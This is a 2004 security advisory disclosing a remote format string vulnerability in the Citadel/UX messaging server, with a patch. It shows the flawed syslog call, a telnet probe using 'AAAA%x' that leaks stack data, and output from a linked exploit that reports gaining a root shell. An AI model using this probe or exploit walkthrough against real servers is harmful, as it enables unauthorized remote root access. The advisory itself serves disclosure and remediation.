------------------------------------------------- No System Group - Advisory #09 - 12/12/04 ------------------------------------------------- Program: Citadel/UX Homepage: http://www.citadel.org Operating System: Linux and Unix-Compatible Vulnerable Versions: Citadel/UX v6.27 and prior Risk: High Impact: Remote Format String Vulnerability ------------------------------------------------- - DESCRIPTION ------------------------------------------------- Citadel/UX is an advanced client/server messaging and collaboration system for BBS and groupware applications. Users can connect to Citadel/UX using any telnet, WWW, or client software. Among the features supported are public and private message bases (rooms), electronic mail, real-time chat, paging, etc. The server is multithreaded and can easily support a large number of concurrent users. In addition, SMTP, IMAP, and POP3 servers are built-in for easy connection to Internet mail. Citadel/UX is both robust and mature, having been developed over the course of the past thirteen years. More informations at: http://www.citadel.org - DETAILS ------------------------------------------------- Exist a format string bug in the lprintf() function of sysdep.c when parses erroneous arguments to the syslog() function. This may to cause a denial of service or give remote shell with privileges of Citadel/UX. ---------- sysdep.c ---------- 108: void lprintf(enum LogLevel loglevel, const char *format, ...) { 109: va_list arg_ptr; 110: char buf[SIZ]; 111: 112: va_start(arg_ptr, format); 113: vsnprintf(buf, sizeof(buf), format, arg_ptr); 114: va_end(arg_ptr); 115: 116: if (syslog_facility >= 0) { 117: if (loglevel <= verbosity) { 118: /* Hackery -IO */ 119: if (CC && CC->cs_pid) { 120: memmove(buf + 6, buf, sizeof(buf) - 6); 121: snprintf(buf, 6, "[%3d]", CC->cs_pid); 122: buf[5] = ' '; 123: } 124: syslog(loglevel, buf); // <-- the format bug 125: } 126: } ---------- sysdep.c ---------- Now we proceed to see what happens. coki@nosystem:~/audit$ telnet localhost 504 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. 200 nosystem Citadel server ready. AAAA%x 530 Unrecognized or unsupported command. quit 200 Goodbye. Connection closed by foreign host. coki@nosystem:~/audit$ We connect us to Citadel/UX server to 504 port and send a test string. coki@nosystem:~/audit$ tail -n 5 /var/log/messages Dec 12 11:08:18 nosystem citadel[1305]: Database log file cull ended. Dec 12 11:08:19 nosystem citadel[1303]: [ 1] Session started. Dec 12 11:08:33 nosystem citadel[1303]: [ 1] Citadel: AAAA8090fe0 Dec 12 11:08:35 nosystem citadel[1303]: [ 1] Citadel: quit Dec 12 11:08:35 nosystem citadel[1303]: [ 1] Session ended. coki@nosystem:~/audit$ We can to see part of the stack sending a malicious format string. - EXPLOIT ------------------------------------------------- I have written a code exploit that use this format bug for to obtain a remote shell in a target. http://www.nosystem.com.ar/exploits/citadel_fsexp.c coki@servidor:~$ make citadel_fsexp coki@nosystem:~/audit$ ./citadel_fsexp -h localhost -t0 Citadel/UX v6.27 remote format string exploit by CoKi [*] host : localhost [*] system : Slackware Linux 10.0 [*] syslog GOT address : 0x0809e9e8 [*] RET address : 0xbfffd5fa [+] verifying host... OK [+] conecting... OK [+] building evil buffer... OK [+] sending evil buffer... OK [+] waiting for shell... [+] connecting to shell... OK [!] you have a shell :) Linux nosystem 2.4.26 #29 Mon Jun 14 19:22:30 PDT 2004 i686 unknown unknown GNU/Linux uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy) - SOLUTIONS ------------------------------------------------- The patch is included here: --- sysdep.c 2004-11-03 17:19:00.000000000 -0300 +++ sysdep.c 2004-12-12 13:14:12.000000000 -0300 @@ -121,7 +121,7 @@ snprintf(buf, 6, "[%3d]", CC->cs_pid); buf[5] = ' '; } - syslog(loglevel, buf); + syslog(loglevel, "%s", buf); } } else if (loglevel <= verbosity) { - REFERENCES ------------------------------------------------- http://www.nosystem.com.ar/advisories/advisory-09.txt - CREDITS ------------------------------------------------- Discovered by CoKi No System Group - http://www.nosystem.com.ar